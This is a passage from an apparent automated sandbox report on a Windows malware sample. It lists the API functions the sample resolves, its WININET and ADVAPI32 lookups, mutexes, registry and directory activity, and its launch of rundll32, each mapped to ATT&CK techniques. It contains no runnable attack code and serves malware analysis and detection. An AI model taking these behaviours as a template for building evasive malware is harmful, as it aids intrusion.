\"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" called \"GetProcAddress\" with a parameter GetLayout (UID: 00000000-00005944)\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" called \"GetProcAddress\" with a parameter GdiRealizationInfo (UID: 00000000-00005944)\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" called \"GetProcAddress\" with a parameter FontIsLinked (UID: 00000000-00005944)\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyExW (UID: 00000000-00005944)\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" called \"GetProcAddress\" with a parameter RegQueryInfoKeyW (UID: 00000000-00005944)\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" called \"GetProcAddress\" with a parameter GetTextFaceAliasW (UID: 00000000-00005944)\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" called \"GetProcAddress\" with a parameter RegEnumValueW (UID: 00000000-00005944)\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" called \"GetProcAddress\" with a parameter RegCloseKey (UID: 00000000-00005944)\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" called \"GetProcAddress\" with a parameter RegQueryValueExW (UID: 00000000-00005944)\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" called \"GetProcAddress\" with a parameter GetFontAssocStatus (UID: 00000000-00005944)\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" called \"GetProcAddress\" with a parameter RegQueryValueExA (UID: 00000000-00005944)\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" called \"GetProcAddress\" with a parameter RegEnumKeyExW (UID: 00000000-00005944)\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" called \"GetProcAddress\" with a parameter ThemeInitApiHook (UID: 00000000-00005944)\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" called \"GetProcAddress\" with a parameter IsProcessDPIAware (UID: 00000000-00005944)\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" called \"GetProcAddress\" with a parameter DwmIsCompositionEnabled (UID: 00000000-00005944)\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" called \"GetProcAddress\" with a parameter GdiIsMetaPrintDC (UID: 00000000-00005944)\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" called \"GetProcAddress\" with a parameter CoInitializeEx (UID: 00000000-00005944)\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" called \"GetProcAddress\" with a parameter CoUninitialize (UID: 00000000-00005944)\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" called \"GetProcAddress\" with a parameter CoRegisterInitializeSpy (UID: 00000000-00005944)\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" called \"GetProcAddress\" with a parameter CoRevokeInitializeSpy (UID: 00000000-00005944)\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" called \"GetProcAddress\" with a parameter CoCreateInstance (UID: 00000000-00005944)\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" called \"GetProcAddress\" with a parameter UnregisterTraceGuids (UID: 00000000-00005944)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter CoTaskMemFree (UID: 00000000-00004384)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionEx (UID: 00000000-00004384)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00004384)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00004384)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00004384)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter LCMapStringEx (UID: 00000000-00004384)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00004384)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter InitOnceExecuteOnce (UID: 00000000-00004384)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter CreateEventExW (UID: 00000000-00004384)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreW (UID: 00000000-00004384)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreExW (UID: 00000000-00004384)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolTimer (UID: 00000000-00004384)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolTimer (UID: 00000000-00004384)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter WaitForThreadpoolTimerCallbacks (UID: 00000000-00004384)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolTimer (UID: 00000000-00004384)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWait (UID: 00000000-00004384)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolWait (UID: 00000000-00004384)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWait (UID: 00000000-00004384)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter FlushProcessWriteBuffers (UID: 00000000-00004384)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter FreeLibraryWhenCallbackReturns (UID: 00000000-00004384)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessorNumber (UID: 00000000-00004384)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter CreateSymbolicLinkW (UID: 00000000-00004384)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter GetCurrentPackageId (UID: 00000000-00004384)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter GetTickCount64 (UID: 00000000-00004384)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter GetFileInformationByHandleEx (UID: 00000000-00004384)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter SetFileInformationByHandle (UID: 00000000-00004384)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter GetSystemTimePreciseAsFileTime (UID: 00000000-00004384)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter InitializeConditionVariable (UID: 00000000-00004384)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter WakeConditionVariable (UID: 00000000-00004384)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter WakeAllConditionVariable (UID: 00000000-00004384)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableCS (UID: 00000000-00004384)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter InitializeSRWLock (UID: 00000000-00004384)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00004384)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter TryAcquireSRWLockExclusive (UID: 00000000-00004384)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00004384)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableSRW (UID: 00000000-00004384)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWork (UID: 00000000-00004384)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter SubmitThreadpoolWork (UID: 00000000-00004384)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWork (UID: 00000000-00004384)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter CompareStringEx (UID: 00000000-00004384)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoEx (UID: 00000000-00004384)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter AreFileApisANSI (UID: 00000000-00004384)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter RtlGetVersion (UID: 00000000-00004384)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter CopySid (UID: 00000000-00004384)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter ConvertSidToStringSidW (UID: 00000000-00004384)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter ConvertStringSecurityDescriptorToSecurityDescriptorW (UID: 00000000-00004384)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter ThemeInitApiHook (UID: 00000000-00004384)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter IsProcessDPIAware (UID: 00000000-00004384)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter IUnknown_QueryService (UID: 00000000-00004384)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter EventRegister (UID: 00000000-00004384)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter RegGetValueA (UID: 00000000-00004384)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyExA (UID: 00000000-00004384)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter CoTaskMemAlloc (UID: 00000000-00004384)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter WinHttpCreateProxyResolver (UID: 00000000-00004384)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter RegQueryValueExW (UID: 00000000-00004384)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter EventActivityIdControl (UID: 00000000-00004384)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter WSPStartup (UID: 00000000-00004384)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter RegCreateKeyExW (UID: 00000000-00004384)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter WSHOpenSocket (UID: 00000000-00004384)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter WSHOpenSocket2 (UID: 00000000-00004384)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter WSHJoinLeaf (UID: 00000000-00004384)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter WSHNotify (UID: 00000000-00004384)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter WSHGetSocketInformation (UID: 00000000-00004384)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter WSHSetSocketInformation (UID: 00000000-00004384)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter WSHGetSockaddrType (UID: 00000000-00004384)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter WSHGetWildcardSockaddr (UID: 00000000-00004384)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter WSHGetBroadcastSockaddr (UID: 00000000-00004384)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter WSHAddressToString (UID: 00000000-00004384)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter WSHStringToAddress (UID: 00000000-00004384)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter WSHIoctl (UID: 00000000-00004384)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter WSAIoctl (UID: 00000000-00004384)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter NotifyIpInterfaceChange (UID: 00000000-00004384)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter NotifyUnicastIpAddressChange (UID: 00000000-00004384)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter GetBestInterfaceEx (UID: 00000000-00004384)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter GetIfEntry2 (UID: 00000000-00004384)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter GetUserNameExW (UID: 00000000-00004384)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter SHGetValueA (UID: 00000000-00004384)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter RegDeleteValueW (UID: 00000000-00004384)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter DnsGetProxyInformation (UID: 00000000-00004384)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter NdrClientCall2 (UID: 00000000-00004384)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter RpcStringBindingComposeW (UID: 00000000-00004384)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter RpcBindingFromStringBindingW (UID: 00000000-00004384)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter RpcStringFreeW (UID: 00000000-00004384)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter RpcBindingFree (UID: 00000000-00004384)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter CoInitializeEx (UID: 00000000-00004384)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter SystemFunction036 (UID: 00000000-00004384)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter EventWrite (UID: 00000000-00004384)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter CoCreateInstance (UID: 00000000-00004384)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter CLSIDFromOle1Class (UID: 00000000-00004384)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter GetCatalogObject (UID: 00000000-00004384)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter GetCatalogObject2 (UID: 00000000-00004384)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter DllGetClassObject (UID: 00000000-00004384)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter DllCanUnloadNow (UID: 00000000-00004384)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter GetAdaptersAddresses (UID: 00000000-00004384)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter Dhcpv6QueryLeaseInfo (UID: 00000000-00004384)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter GetAddrInfoW (UID: 00000000-00004384)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter ConvertInterfaceNameToLuidW (UID: 00000000-00004384)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter NSPStartup (UID: 00000000-00004384)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter DnsQueryConfigAllocEx (UID: 00000000-00004384)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter DnsNameCompare_W (UID: 00000000-00004384)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter DnsApiAlloc (UID: 00000000-00004384)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter DnsQueryExW (UID: 00000000-00004384)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter GetCurrentThreadCompartmentId (UID: 00000000-00004384)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter WSAttemptAutodialAddr (UID: 00000000-00004384)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter WSAttemptAutodialName (UID: 00000000-00004384)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter WSNoteSuccessfulHostentLookup (UID: 00000000-00004384)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter DnsApiFree (UID: 00000000-00004384)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter Dhcpv6FreeLeaseInfo (UID: 00000000-00004384)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter DhcpIsEnabled (UID: 00000000-00004384)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter DhcpQueryLeaseInfo (UID: 00000000-00004384)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter NdrOleInitializeExtension (UID: 00000000-00004384)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter CoGetClassObject (UID: 00000000-00004384)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter CoGetMarshalSizeMax (UID: 00000000-00004384)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter CoMarshalInterface (UID: 00000000-00004384)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter CoUnmarshalInterface (UID: 00000000-00004384)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter StringFromIID (UID: 00000000-00004384)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter CoGetPSClsid (UID: 00000000-00004384)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter CoReleaseMarshalData (UID: 00000000-00004384)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter DcomChannelSetHResult (UID: 00000000-00004384)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter LookupAccountNameLocalW (UID: 00000000-00004384)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter DhcpFreeLeaseInfo (UID: 00000000-00004384)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter LookupAccountSidW (UID: 00000000-00004384)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter LookupAccountSidLocalW (UID: 00000000-00004384)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter CryptAcquireContextW (UID: 00000000-00004384)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter DhcpRequestParams (UID: 00000000-00004384)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter CPAcquireContext (UID: 00000000-00004384)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter CPReleaseContext (UID: 00000000-00004384)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter CPGenKey (UID: 00000000-00004384)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter CPDeriveKey (UID: 00000000-00004384)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter CPDestroyKey (UID: 00000000-00004384)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter CPSetKeyParam (UID: 00000000-00004384)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter CPGetKeyParam (UID: 00000000-00004384)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter CPExportKey (UID: 00000000-00004384)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter CPImportKey (UID: 00000000-00004384)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter CPEncrypt (UID: 00000000-00004384)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter CPDecrypt (UID: 00000000-00004384)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter CPCreateHash (UID: 00000000-00004384)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter CPHashData (UID: 00000000-00004384)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter CPHashSessionKey (UID: 00000000-00004384)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter CPDestroyHash (UID: 00000000-00004384)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter CPSignHash (UID: 00000000-00004384)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter CPVerifySignature (UID: 00000000-00004384)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter CPGenRandom (UID: 00000000-00004384)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter CPGetUserKey (UID: 00000000-00004384)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter CPSetProvParam (UID: 00000000-00004384)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter CPGetProvParam (UID: 00000000-00004384)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter CPSetHashParam (UID: 00000000-00004384)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter CPGetHashParam (UID: 00000000-00004384)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter CPDuplicateKey (UID: 00000000-00004384)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter CPDuplicateHash (UID: 00000000-00004384)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter ConvertInterfaceGuidToLuid (UID: 00000000-00004384)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter OpenThreadToken (UID: 00000000-00004384)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter OpenProcessToken (UID: 00000000-00004384)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter GetTokenInformation (UID: 00000000-00004384)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter AllocateAndInitializeSid (UID: 00000000-00004384)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter EqualSid (UID: 00000000-00004384)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter FreeSid (UID: 00000000-00004384)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter CryptGenRandom (UID: 00000000-00004384)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter I_RpcInitFwImports (UID: 00000000-00004384)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter I_RpcInitImports (UID: 00000000-00004384)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter I_RpcVerifierCorruptionExpected (UID: 00000000-00004384)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter I_RpcExtInitializeExtensionPoint (UID: 00000000-00004384)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter CoInternetCreateSecurityManager (UID: 00000000-00004384)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter CoInternetCreateZoneManager (UID: 00000000-00004384)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter GetAddrInfoExW (UID: 00000000-00004384)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter DnsFree (UID: 00000000-00004384)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter NamespaceCallout (UID: 00000000-00004384)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter QueryActCtxW (UID: 00000000-00004384)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter GetModuleHandleExW (UID: 00000000-00004384)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter CreateActCtxW (UID: 00000000-00004384)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter ActivateActCtx (UID: 00000000-00004384)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter FindActCtxSectionStringW (UID: 00000000-00004384)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter LpkEditControl (UID: 00000000-00004384)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyW (UID: 00000000-00004384)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter GetIpForwardTable2 (UID: 00000000-00004384)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter GetIpNetEntry2 (UID: 00000000-00004384)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter FreeMibTable (UID: 00000000-00004384)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter DeactivateActCtx (UID: 00000000-00004384)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter CoUninitialize (UID: 00000000-00004384)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter getaddrinfo (UID: 00000000-00004384)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter getnameinfo (UID: 00000000-00004384)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter freeaddrinfo (UID: 00000000-00004384)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter WSASocketA (UID: 00000000-00004384)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter CoSetProxyBlanket (UID: 00000000-00004384)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter ObjectStublessClient10 (UID: 00000000-00004384)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter WSASend (UID: 00000000-00004384)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter WSARecv (UID: 00000000-00004384)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-8", "type": 6, "relevance": 1, "name": "Looks up procedures from modules (excluding apphelp.dll, kernel32.dll, user32.dll, gdi32.dll, ole32.dll, comctl32.dll, uxtheme.dll, oleaut32.dll, version.dll, msctfime.ime)", "description": "\"15001600c03ef269@ADVAPI32.dll\"\n \"0e000f00703ff269@ADVAPI32.dll\"\n \"0e000f00cc3ff269@ADVAPI32.dll\"\n \"11001200b447f269@ADVAPI32.dll\"\n \"110012004848f269@ADVAPI32.dll\"\n \"120013008c48f269@ADVAPI32.dll\"\n \"12001300e448f269@ADVAPI32.dll\"\n \"14001500386ef269@ADVAPI32.dll\"\n \"14001500506ef269@ADVAPI32.dll\"\n \"14001500686ef269@ADVAPI32.dll\"\n \"17001800806ef269@ADVAPI32.dll\"\n \"0d000e00986ef269@ADVAPI32.dll\"\n \"11001200a86ef269@ADVAPI32.dll\"\n \"11001200bc6ef269@ADVAPI32.dll\"\n \"0d000e004466f269@WININET.dll\"\n \"0d000e00b466f269@WININET.dll\"\n \"10001100ec66f269@WININET.dll\"\n \"100011009067f269@WININET.dll\"\n \"10001100006ff269@WININET.dll\"\n \"10001100146ff269@WININET.dll\"\n \"14001500286ff269@WININET.dll\"\n \"14001500406ff269@WININET.dll\"\n \"12001300586ff269@WININET.dll\"\n \"120013006c6ff269@WININET.dll\"\n \"10001100d067f269@WININET.dll\"", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "mutant-0", "type": 4, "relevance": 3, "name": "Creates mutants", "description": "\"\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesCacheCounterMutex\"\n \"\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesLockedCacheCounterMutex\"\n \"Local\\ZonesCacheCounterMutex\"\n \"Local\\ZonesLockedCacheCounterMutex\"", "origin": "Created Mutant"}, {"threat_level_human": "informative", "category": "General", "identifier": "registry-72", "type": 3, "relevance": 3, "name": "Overview of unique CLSIDs touched in registry", "description": "\"rundll32.exe\" touched \"WinInetBroker Class\" (Path: \"HKCU\\CLSID\\{C39EE728-D419-4BD4-A3EF-EDA059DBD935}\")\n \"rundll32.exe\" touched \"PSFactoryBuffer\" (Path: \"HKCU\\CLSID\\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\")\n \"rundll32.exe\" touched \"Network List Manager\" (Path: \"HKCU\\CLSID\\{A47979D2-C419-11D9-A5B4-001185AD2B89}\\LOCALSERVER32\")\n \"rundll32.exe\" touched \"NetworkListManager\" (Path: \"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{DCB00C01-570F-4A9B-8D69-199FDBA5723B}\")", "origin": "Registry Access", "attck_id": "T1546.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/015"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-122", "type": 6, "relevance": 3, "name": "Calls an API typically used to create a directory", "description": "\"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" called \"CreateDirectoryA\" with parameter %WINDIR%\\system\\ (UID: 00000000-00005944)\n \"rundll32.exe\" called \"CreateDirectoryW\" with parameter C:\\Users\\%OSUSER% (UID: 00000000-00004384)\n \"rundll32.exe\" called \"CreateDirectoryW\" with parameter %USERPROFILE%\\AppData\\Roaming (UID: 00000000-00004384)\n \"rundll32.exe\" called \"CreateDirectoryW\" with parameter %APPDATA%\\Microsoft\\Windows\\Cookies (UID: 00000000-00004384)\n \"rundll32.exe\" called \"CreateDirectoryW\" with parameter %USERPROFILE%\\AppData\\Local (UID: 00000000-00004384)\n \"rundll32.exe\" called \"CreateDirectoryW\" with parameter %LOCALAPPDATA%\\Microsoft\\Windows\\History (UID: 00000000-00004384)", "origin": "API Call", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-128", "type": 6, "relevance": 5, "name": "Calls an API typically used to create a process", "description": "\"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" called \"CreateProcessA\" with parameter \"%WINDIR%\\system\\rundll32.exe\" - (UID: 00000000-00005944)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-70", "type": 6, "relevance": 10, "name": "Scanning for window names", "description": "\"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" searching for class \"#32770\"", "origin": "API Call", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-153", "name": "Uses 32 bit executable PE", "description": "\"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"notepad_.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"_.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"RUNDLL32.EXE.67A47D15.bin\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-96", "name": "PE file entrypoint instructions", "description": "\"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8\" file has an entrypoint instructions - \"push\tebp,mov\tebp, esp,push\t-1,push\t0x40b5d8,push\t0x40a4d6,mov\teax, dword ptr fs:[0],push\teax,mov\tdword ptr fs:[0], esp,sub\tesp, 0x68,push\tebx,push\tesi,push\tedi,mov\tdword ptr [ebp - 0x18], esp,xor\tebx, ebx,mov\tdword ptr [ebp - 4], ebx,push\t2,call\tdword ptr [0x40b210],pop\tecx,or\tdword ptr [0x40e6b0], 